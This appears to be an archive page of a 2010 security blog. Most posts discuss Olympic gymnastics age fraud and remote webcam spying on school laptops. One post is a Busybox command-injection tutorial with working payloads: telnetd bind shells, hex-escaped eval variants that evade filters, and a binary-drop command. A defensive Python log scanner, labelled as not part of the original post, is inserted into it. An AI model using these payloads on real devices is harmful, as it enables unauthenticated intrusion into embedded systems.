Thursday, August 12, 2010

Medals Delivered, Questions Unanswered

Timeline, 2008

Today, the press is reporting the result of the IOC's investigation: a medal presentation ceremony for the US Sydney gymnastics squad, bronze medals delivered a decade late.


It's a touching story and one I'm proud to be a part of. As I read the reporting surrounding the event, however, I continue to be perplexed by the version that is being put forward.

FIG [...] investigated whether underage gymnasts competed for China at the 2008 Summer Games in Beijing, but found no evidence of wrongdoing. As they pursued those claims last fall, officials decided to take another look at allegations surrounding the ages of two Chinese gymnasts from Sydney.
- The Washington Post

No evidence of wrongdoing? Certainly voluminous records of wrongdoing were published on this blog. But what did the FIG actually say? Perhaps the Washington Post should read this interview with the president of FIG:

"Grandi said it was conceivable that China had cheated in Beijing"
"There was strong circumstantial evidence, certainly, but these investigations are not my job ... I'm not the police or Interpol"

- Bruno Grandi, President, FIG

More incredible than the claim that the FIG "found no evidence" is the implicit assertion that the IOC/FIG started investigating on September 24th, 2008, because it was just the right day to start looking into fraud eight years later. I do not believe that the investigation was launched two days after we published the Yang Yun video simply out of coincidence. I will never believe this. To do so means that the risks and sacrifices made by the people within China who worked to leak information to me and other bloggers were meaningless. The truth is clear to anyone who reads this blog's archives and examines the documents presented: state sponsored sporting fraud was committed by the Chinese state in Sydney and in Beijing. The fraud was revealed due to the Chinese state's inability to control the compulsory transparency it forced onto its citizens. And the fraud was ignored due to the inability of the FIG & IOC to engage the expertise necessary to validate electronically obtained documents.


So if it's said nowhere else, let it be said here. To those who risked discovery, imprisonment, and worse to get this information to the world: Thank You. For my part, I did my best to represent you.

If you'd like to read the official Chinese response, try to access this link:
http://www.baidu.com/s?wd=cache:strydehax.blogspot.com
That URL is an attempt to retrieve this blog from the archives of the Chinese search engine Baidu. Visiting the link will result in a forcibly terminated connection via automated Internet censorship; you will simply receive a browser error. And that is the official response.
-stryde.hax



Saturday, April 17, 2010

A Flurry of Spycam News

New allegations abound regarding high school teachers spying on students. A drama teacher has now been arrested for hiding a camera in order to catch students undressing. His name was Larry Dibble, and it happened in Ohio, not Pennsylvania. Unfortunately I didn't find out from the news; instead, I found out from my alumni newsletter. As I follow this story I can't help wishing I'd had a chance to help; I think I had an above-average shot at digging up the 1995 court case against Dibble in Minnesota. It's important to start out talking about Dibble, though, because I believe that when apologists speak about giving school officials unaccountable surveillance powers, they forget that people like Dibble exist. When we talk about trusting schools with the responsibility to choose when to activate spycams, it's important to understand that people like Dibble will be drawn to those positions of power. It's something I wish Henrico County was thinking about as they continue to deploy jailed laptops equipped with remote observation against their students.

The press is having a field day with the amazing allegations being made by the lawyer behind the PA lawsuit: thousands of pictures, pictures of students in partial states of undress, pictures of students sleeping, email exchanges between school administrators reveling in their powers of observation. What's important to remember about these allegations is that they're still allegations. Perhaps the lawyer is sharing part of the discovery process, or perhaps the lawyer is trying to keep his case alive in the press. It's hard to say. But I believe it is extremely telling that the judge has issued an order against releasing the spycam photos following the publication at Philly.com of photos of Robbins sleeping, and the first school administrator to be questioned has pleaded the Fifth and refused to answer any questions. Meanwhile the school has apparently retracted its claim that the webcams were only activated 42 times, revising the estimate from 42 to "substantial" (presumably a number greater than 42), and is individually notifying the families of children who appeared in laptop webcam photographs.

Maybe the allegations are true, maybe they're not. I will say that right now, the school's defense doesn't pass the smell test. If I were forced to bet, I'd bet that everything in the revised complaint is true. And truth be told, this shouldn't come as a surprise. This is the only logical outcome of distributing jailed devices equipped with surveillance hardware and legal barriers against owner observation.

If you can't see the parallels between this case and 1984 being digitally wiped from millions of jailed ebook readers, if you can't see the connection to criminally enforced consumer lockout using the DMCA, then you're not paying attention. There's a reason Apple is filing legal briefs alleging that jailbreaking is terrorism. Anything that keeps the consumer out of their own devices helps to remove pesky questions like the ones being asked right now in Pennsylvania. Blind, restricted consumers are good for business; free citizens create problems. Many read these arguments and believe that because people are still openly jailbreaking, it doesn't matter if it's illegal. Of course, it's only a problem of scale. The Department of Homeland Security is busy arresting people for breaking into devices they own. The only reason iPhone jailbreakers aren't going to federal prison is that there are more of them than the prison system can handle, a situation we shouldn't expect to last. Don't be fooled; this war is only getting started.

-stryde.hax

Sunday, March 21, 2010

Webcam Activation Illegal?

I wanted to briefly mention the great follow-up reporting going on at Philly.com on the Harriton High spycam case. This article contains so much great detail and investigative reporting that to summarize it here wouldn't do it justice; if you're following this case, I encourage you to read the whole thing. I wanted to briefly call out one detail, however. There's been a lot of commentary on this blog to the effect that the school might have been within its legal boundaries when activating webcams remotely for the purpose of theft tracking. Not being a lawyer, I've been hesitant to render a legal opinion. However, I find this quote telling:

Joseph Daly, who retired in 2009 as Lower Merion police superintendent, said he never knew that his department was being furnished with pictures snapped from students' laptops.

"God, no, I don't remember that," he said when told about it. "That's illegal as hell."


Well then. Unless he's been grossly misquoted, I believe we have an expert opinion at last.

-stryde.hax

Thursday, March 18, 2010

Where Have All the Hackers Gone?

Recently a high school in Pennsylvania shocked the nation when it became the subject of a lawsuit alleging that webcams in school-issued laptop computers were being remotely activated by school staff, used to snap photos of students in their homes. As a computer security professional I dug into the story with the help of my colleagues, and together we found that the networked webcam capability built into these computers by the school district was absolutely real. Our findings were greeted with surprise and dismay; they have caused a nationwide outcry. The truth is, this shouldn't have been a surprise. America has been on this road for years.

Nearly every wired school district in America uses some form of remote administration software. This software varies in the degree of control that it exerts over student computers. The trend started with web filtering and progressed to allow remote use of students' desktops by teachers. Some advanced schools now allow surreptitious eavesdropping on students' desktops while they are working. Today on the cutting edge of this trend is Harriton High, with thousands of taxpayer-purchased laptops issued to children, and school staff armed with the ability to take remote webcam pictures of the students at will. This isn't a revolution, it's just a bump on the ride.

Historian James Bradley writes in FlyBoys about a nation of young men growing up in pre-WWII America tinkering, modifying, and optimizing a new wave of internal combustion powered machines. Bradley talks about the inherent advantage that this generation of tinkers gave America in the coming aerial conflict, where pushing new technology to its limits was the key to a new form of warfare: aerial combat. When it comes to information technology, it's time we ask ourselves: where will we find our next generation of computing tinkers? This problem is only now becoming apparent at a national level. The US Air Force is currently holding Cyber Defense competitions at the high school level, nationwide. The Defense Advanced Research Projects Agency (DARPA) recently released a paper stating that the United States will be “hampered” by its projected dearth of expertise in Internet technologies and information security: “we are steadily losing the engineering talent to project these systems.” As our government begins to identify a critical shortage that has been evident in my industry for years as a national security threat, I believe it is time we asked ourselves: “Where have all the hackers gone?”

The answer is that we've stopped making them. Before building Apple Computer, Jobs & Wozniak hacked the phone system. I grew up hacking the computer they built, the Apple ][. Critical events in my personal and professional development were dependent on my ability to access the core of how computers worked in order to understand them, re-purpose them, and harness them to my will. The Greatest Generation supercharged their Chevys; my generation peeked and poked at the internal memory of our Apple computers. Today's generation is growing up in a new era of “jailed” devices, devices like the laptops at Harriton, which were jailed against any student use except approved applications. To tinker with these computers, students were first required to “jailbreak”, a technical feat which would have given students the freedom to understand their computers and to determine who was remotely activating their webcams. Not surprisingly, jailbreaking carried the threat of stringent penalties from the school. A student locked inside a digital jail of this type could never start down the road of digital proficiency necessary to reach the finish line DARPA is asking for.

Digital jails are not solely the realm of education. Devices like the Amazon Kindle and Apple iPhone are jailed against any unauthorized consumer use, guarded by strict but unproven new federal laws against jailbreaking them. Jailed devices are controlled by a networked authority, be it a company like Apple, a school district, an employer, or a government. Jailed devices teach a different kind of lesson to the people who use them: your camera may be monitored, your books may be deleted, your work process may be watched. And most importantly, your attempts to delve into the mysteries of how the device functions will be punished.

We've reached a fork in the road at Harriton High. As the nation watches, we're pondering the consequences of transforming computing devices from machines that we control into machines which exert control over us. As we give away our freedom to tinker, we give away the chance to raise a generation which will lead the information age. It is now time to decide as consumers, as parents, and as a nation which road we will take into the future. I believe that students cannot learn to protect themselves against Internet threats unless they are taught that the power of the Internet comes with a price tag to be paid in responsibility. The responsibility to learn, understand, and master digital self defense. The responsibility to peer inside the machine in order to master it. In order to take on this responsibility, we need to loosen our grip on the reins and let our children show us the way.


-stryde.hax

Thursday, March 11, 2010

Busybox Command Injection

Linux Inside

The number of Linux-powered devices on the market is exploding. As this CCC paper points out, Linux is finding its way into everything - GPS units, television set tops, phones, routers, the works. That leaves a lot of hacking to be done, and this last month I got to spend some time with Intrepidus jailbreaking and exploiting some embedded devices. One big surprise I encountered was the difficulty of landing even simple command-injection vulnerabilities on embedded Linux.

I can't believe it's not Linux

The big problem with a lot of embedded Linux devices is they're not really running Linux. If you haven't heard of Busybox before, it's the core functionality of Linux condensed into a single multi-call binary. Busybox offers embedded device developers a simple distribution of Linux without the large filesize footprint and complexity of porting a full Linux toolchain to embedded hardware. From a hacker's perspective, an embedded Busybox install can pose some unique challenges, especially if you're throwing your exploit "blind", without the ability to see error messages:

  • busybox's ash shell lacks the full functionality of bash and other shells

  • busybox's available functionality depends on compile options chosen by the developers, so every device has the potential to pose unique challenges

  • busybox's implementation of most commands has slightly different functionality and different command line flags than the corresponding Linux versions

  • Standard pipe-redirect callback shells often fail; in fact, I've never gotten a standard two-window "telnet | ash | telnet" shell to work on busybox.

What's Command Injection?

Command injection vulnerabilities are usually some of the simplest exploits to land, requiring no assembly and only a little shell knowledge. They can occur whenever developers use user-supplied data as an argument to a shell command. This can happen in a number of ways, and writing a complete reference on all the ways this type of bug can manifest itself is a large topic; OWASP has a good writeup on programmatic (system call) command injection. This writeup isn't about how injection works; it's about how you can exploit injection on busybox. Here's where things get weird.


busybox sh


BusyBox v1.1.3 Built-in shell (ash)
Enter 'help' for a list of built-in commands.

~ $ ping 127.0.0.1
ping: permission denied. (are you root?)

Busybox isn't quite Linux! If you are attempting to find or exploit a "blind" command injection vuln and the target process is not a superuser process, using ping to "beacon" out to your attack box won't work, because on busybox ping requires superuser privs. Telnet is a better beacon choice, as it is part of the default build process and must be manually removed.

Chaining Commands: Nothing New Here

The basics of adding execution to an input argument don't change much with busybox's shell:


~ $ true;echo Execution
Execution
~ $ false;echo Execution
Execution
~ $ true|echo Execution
Execution
~ $ false|echo Execution
Execution
~ $ false||echo Execution
Execution
~ $ true&&echo Execution
Execution
~ $ echo `echo Execution`
Execution
~ $ echo $(echo Execution)
Execution

Getting Access

The absolute easiest way to try to get access to a busybox install via command injection is telnetd. Busybox's telnetd is different: on a normal telnetd install the "-l" flag enables line mode, but on busybox, -l specifies the command to use to challenge the user. That means if you specify the busybox shell, you get a shell without a user/pass prompt:


telnetd -l/bin/sh

That's the shortest possible string that can land a shell on a busybox system. Of course, here's where things get tricky. If telnet is already open, this will fail; it will also fail to bind a privileged port when run as a non-root user. Finally, if the environment does not contain a valid PATH value, the command will fail.


/bin/busybox telnetd -l/bin/sh -p9999

The command above will bind a telnet shell to port 9999 without a PATH value and without running as root. Of course, now things get difficult.

Restrictions

Sample exploit conditions are always easy to land and never have anything annoying in the way like character filters or buffer lengths. The real world is different; exploitation often requires circumventing limitations. As far as length goes, the commands above pretty much cover the shortest possible exploit strings. Character set limitations are a different story. Embedded device character set limitations can be pretty heavy duty, enforced by on-screen-keyboards, security character filters, and other methods. A common limitation is space-bounded copy, generated by a tokenizer which clips a supplied argument to everything up to the first instance of whitespace. Here are some ways to work around these limitations:


~ $ echo -e \\x7c\\x7c\\x2e
||.
~ $ printf \\x7c\\x2e\\x0a
|.

Busybox supports evaluation of slash-escaped characters both using echo and the shell builtin printf. This can be used to encode a lot of the characters that are often stripped. Different execution methods require different levels of escaping. Here are some combinations that work; note that I have included the command "true" to show where a successful system command would lie in the overall exploit.


true|/bin/busybox telnetd -l/bin/sh -p9999
# Character set required: -/

true|eval $(printf telnetd\\x20\\x2dl\\x2fbin\\x2fsh\\x20\\x2dp9999)
# Character set required: $()\

true|eval `printf telnetd\\\\x20\\\\x2dl\\\\x2fbin\\\\x2fsh\\\\x20\\\\x2dp9999`
# Character set required: `\

If you're attempting to jailbreak a potential busybox device, and you're fuzzing a net-facing service, the strings above coupled with a good [&& / || / | / ; / $() / ``] regular expression should get you started; just monitor port 9999. If you manage to land on a device with the methods I've listed here, drop me a line and let me know how it went down. If you're determined to drop a binary on the device a few bytes at a time, this should get you started:


eval echo -n $(echo -e -n \\xde\\xad\\xbe\\xef $(printf \\x3e\\x3e\\x2ftmp\\x2fig))
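As an added defender-side example (not code from the original post), here is a Python log scanner that applies the post's metacharacter regex both to the raw request parameter and to its escape-decoded form, so that hex-escaped payloads like the ones above are not missed by a filter that only looks for literal characters. The ping.cgi endpoint, its host parameter, the access-log format and the client IP are all assumed; the payload strings are the ones shown in the post.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Shell metacharacters from the post's suggested fuzzing regex: && || | ; $() ``
META_RE = re.compile(r"&&|\|\||\||;|\$\(|`")
# telnetd with -l<absolute path>: the login-program override the post describes
TELNETD_RE = re.compile(r"telnetd\s+-l\s*/\S+")
# \xNN hex escapes as busybox `echo -e` and `printf` evaluate them
HEX_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
# Request line inside a common-log-format access log entry
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_escapes(value: str) -> str:
    """Collapse doubled backslashes (one pair per shell/eval layer), then decode
    \\xNN sequences, so the filter sees what the device's shell would execute."""
    while "\\\\" in value:
        value = value.replace("\\\\", "\\")
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), value)


def param_values(log_line: str) -> list:
    """Extract and URL-decode every query-string value from a log line."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    return [v for vals in parse_qs(query, keep_blank_values=True).values() for v in vals]


def scan_line(log_line: str) -> str:
    """Classify a log line: 'shell_bind' if a decoded value carries a telnetd -l
    bind, 'metachars' if raw shell metacharacters are present, 'encoded' if
    metacharacters appear only after escape decoding, else 'clean'."""
    verdict = "clean"
    for value in param_values(log_line):
        decoded = decode_escapes(value)
        if TELNETD_RE.search(decoded):
            return "shell_bind"
        if META_RE.search(value):
            verdict = "metachars"
        elif verdict == "clean" and META_RE.search(decoded):
            verdict = "encoded"
    return verdict


def make_log_line(value: str) -> str:
    """Constructed common-log-format entry for a hypothetical ping.cgi whose
    'host' parameter reaches the shell (the service and client IP are made up)."""
    return ('192.0.2.10 - - [11/Mar/2010:12:00:00 +0000] "GET /cgi-bin/ping.cgi?host='
            + quote(value, safe="") + ' HTTP/1.1" 200 17')


# Constructed sample values; the exploit strings are the ones shown in the post.
SAMPLE_VALUES = {
    "benign": "127.0.0.1",
    "plain": "127.0.0.1|/bin/busybox telnetd -l/bin/sh -p9999",
    "printf_eval": r"true|eval $(printf telnetd\\x20\\x2dl\\x2fbin\\x2fsh\\x20\\x2dp9999)",
    "backtick": r"true|eval `printf telnetd\\\\x20\\\\x2dl\\\\x2fbin\\\\x2fsh\\\\x20\\\\x2dp9999`",
    # the post's `echo -e \\x7c\\x7c\\x2e` payload: no raw metacharacters at all
    "hex_only": r"127.0.0.1\\x7c\\x7c\\x2e",
}


def scan_samples() -> dict:
    """Run the scanner over all constructed samples; a literal-only filter would
    pass 'hex_only', the decoded view flags it as 'encoded'."""
    return {name: scan_line(make_log_line(value)) for name, value in SAMPLE_VALUES.items()}


if __name__ == "__main__":
    for name, verdict in scan_samples().items():
        print(f"{name:12s} -> {verdict}")
```

Only the \xNN hex escapes shown in the post are decoded; busybox printf also accepts octal escapes, which a production filter should normalise the same way.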

Notes on Other Exploit Methods

There are plenty of ways to get onto a Unix-based system like busybox other than binding a shell; however, embedded devices often have unique restrictions. Concatenating a user you control to /etc/passwd can silently fail on a read-only filesystem, a very common occurrence on embedded devices. Concatenating binaries from the shell requires precise knowledge of the target architecture type. And when you're jailbreaking, failure is almost universally silent. Good luck,


-stryde.hax

Wednesday, March 3, 2010

Schools Systems Weigh Benefits of Child Porn Roulette

To Catch a Thief (Naked?)


The story of remotely activated webcams in school laptop programs appears to be a nationwide phenomenon. The media outcry over Harriton High appears to have completely missed the fact that an even larger 1:1 educational laptop program has been using webcams for theft tracking for years as well. This great survey reporting from Philly.com shows a wide ranging reaction from school officials regarding remote laptop activation, from those that get it, to those who don't, those that are quietly deleting their webcam access, and those who... wait, huh, what?

"I didn't even know a computer has the ability to do that"
- Dan Domenech, Executive Director of the American Association of School Administrators

"We had discussed it, but decided not to touch it with a 10-foot pole. ... What if it accidentally started taking pictures? ... You could have an 11-year-old child who steps out of the shower and is toweling off. You could have child pornography. ... Everything is about risk - the risk of losing a device vs. the disaster that can occur ... I would rather lose a computer than hurt a child."
- Jeff Mao, Maine Department of Education

"the McCracken County, Ky., school district began removing tracking software from laptop computers assigned to high school students. Technicians are deleting software that allows access to Web cams and monitors usage on 2,170 laptops"

"In the Henrico County, Va., public schools, which also have a large laptop program, the remotely operated Web cams are disengaged until a computer is stolen. About 26,000 laptops have been issued to students"

You read that right. Harriton is just the tip of the iceberg. Henrico County has been activating their laptop webcams too, and by their admitted numbers, more often than Harriton High:

"Henrico schools spokesman Mychael Dickerson said yesterday that the system has remotely activated cameras 50 times in the past three years to locate computers stolen from elementary schools. Those computers do not go home with students. Of those, 20 have been recovered. The other cases still are under investigation, he said."

Putting aside the amazingly low success ratio apparently quoted above, this means that yet another school district is opting to take pictures of "We'll Find Out What" when laptops go missing. Or as Jeff Mao so eloquently alludes to, they're playing Child Porn Roulette and betting to win in order to find laptops. Unfortunately the ACLU has waded into the fray, armed with all kinds of crazy ideas like "search warrants" and "wiretaps", acting like a total buzzkill and basically spewing common sense everywhere:

"In May of 2009, NBC12 reported the theft of several laptops from Pinchbeck Elementary School. School officials used the police report number -not a warrant- to activate a camera which clearly revealed the suspect, who was arrested a week later, and eventually pled guilty. Now, the ACLU claims that could be an illegal invasion of one's privacy...even that, of a thief."

My personal favorite part of this article is the reporter's shocked tone at the idea that accused criminals have rights. But it's important to note that a warrant was never issued for this search. And that brings me to a really important question regarding search warrants, and their eventual use in programs like this. How does one fill out a webcam search warrant?

We're Going to Search... Something!

If you take a look at the top of the form, you'll see "Name, Address ... premises to be searched". This has always been a part of search warrant forms. With the way webcam theft tracking works, we'll need a new type of search warrant: Location To Be Determined After Search. When these laptops wake up and retrieve orders to activate their webcams, they can literally be anywhere. They can be in a child's bedroom, in a foreign embassy, in a conference room in the hands of someone who inadvertently purchased a hot laptop off eBay, in a SCIF, or anywhere else in the world. And so, we will need to be able to write search warrants that are valid anywhere on the planet. Or, just maybe, that's impossible, and the process of having to get a search warrant in the first place will reveal how truly ludicrous this entire scheme really is. For now, that quiet whirring sound is the sound of administrators across the country deleting their webcam folder.


-stryde.hax




PostScript: "For this school district to develop police powers in secret and then exercise those powers in secret is problematic and disturbing"
-Lillie Coney, EPIC

Saturday, February 27, 2010

FIG Revokes Chinese Gymnastics Medal

I Did My Best

When I meet people in computer security circles or at conferences and I'm identified as Stryde, the Olympic story comes up pretty often, and the comment I seem to get the most is "how did you let them get away with it?" I've never understood this sentiment, the idea that I somehow have more power than a Publish button on Blogger, and I often counter with "Well I was going to launch an airstrike but I reconsidered." Little did I know, the president of the International Gymnastics Federation (FIG), Bruno Grandi, has been using the same joke.

From this interview:
"Grandi said it was conceivable that China had cheated in Beijing"
"There was strong circumstantial evidence, certainly, but these investigations are not my job ... I'm not the police or Interpol. If I find that there was cheating, then I can act." ... "I had everything sent to the IOC and the IOC has carried out its investigations and the figures were the same ... The IOC gave us its findings, and we checked them and there was nothing. When people on the Internet find fake documents, you need to legally prove that these are fake, and that's not my job. I have to respect the documents that the Chinese government gives me. What else should I do - declare war on China?"

Putting aside for a moment the "fake documents" phrase, and assuming for a moment that Grandi does not understand that the documents I linked to were hosted by the Chinese government itself, verifiably, for years, the most important part of that interview is the last phrase. Grandi's process, and the IOC's process, requires them to trust documents that are provided to them by governments. This is a great process for finding athletes that are cheating, and a totally failed process for finding governments that are cheating. What justice system would make the defendant an authority on his own guilt? Only the IOC and the FIG.

As Grandi says, a fact-finding authority with the power to prosecute a government for fraud was never involved. The servers from which the world watched the Chinese government censor the truth in real time were never seized and forensically analyzed. No one was ever caught or prosecuted for deleting any of the primary documents off of Chinese government web servers as age records vanished one by one under our watching eyes. And the reason for this is that the FIG by their own admission are not empowered to question governments. So when we say that the Chinese gymnasts were cleared by the FIG, we need to be very clear about what that actually means: not much.

A Confession Is Not Enough

About a week after the translated Yang Yun video created by Heather Lawver and me was posted, the FIG re-opened their investigation into Chinese gymnasts competing in the Sydney Olympics. Yesterday, as an alert reader pointed out, the FIG revoked the bronze medal awarded to Dong Fangxiao in Sydney, due to paper evidence they managed to find of her employment under her real age. The Chinese government immediately responded, claiming "there is no problem in Dong Fangxiao's age." What's interesting is that the FIG did not revoke the medal of Yang Yun, who is seen here confessing on state television to competing under age. It is important to note that for the FIG, a videotaped confession was not sufficient evidence. So, to summarize:

  • The FIG is by their own admission not authorized to investigate governments for fraud

  • The documents I identified implicate the government as having committed fraud

  • The removal of every single linked document from government web servers indicates fraud

  • A videotaped confession is considered insufficient proof

  • Despite all these limitations, the Chinese have still lost a medal for age falsification

Readers are welcome to examine my archives and what evidence is left and make their own conclusions. I haven't written about this since it happened because I felt it became a sports story and not a technology story, and the technology story I was interested in was becoming lost in the noise. I wanted to talk about document permanence, transparency, and the amazing impact both were having on our culture. Fox News just wanted me to say that someone was cheating. In the end, as the FIG prepares to take a medal back, I will say only this: I stand by the integrity of my findings.


- stryde.hax